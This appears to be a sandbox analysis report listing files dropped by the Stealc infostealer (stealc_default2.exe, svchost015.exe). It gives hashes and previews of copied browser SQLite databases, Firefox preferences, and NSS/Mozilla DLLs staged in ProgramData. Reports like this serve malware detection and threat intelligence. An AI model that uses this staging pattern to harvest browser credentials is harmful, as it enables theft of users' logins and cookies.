SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKJEGCFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGCAAFHIEBKJKEBFIEHDGDAEBK

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGIIDAEBGCAAECAKFHIIJDBAKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFIJJEGHDAEBGCAKJKFHDHCFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBAKJKJJJECFIEBFHIEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJEGCB

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFIECFIJDAAKEBGCGHIEBAKFBK

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGIEGCFHCFHIDHIJECA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJKKKFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFHJJJDAFBKEBGDGHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GCBFBGCGIJKJJKFIDBFCGDBFHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDAAKFIDGIEGDGDHIDAKKFIIID

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDAFHDHCBGDGCBGCGIIEHIDBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKJJKFHIJKKFHJJECBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJEGCBGIDHCAKEBGIIDB

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJDBAAAEHIEGCAKFHCG

Download File

Process:	C:\Users\user\AppData\Local\Temp\svchost015.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KJDGIJECFIEBFIDHCGHDHIEBAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

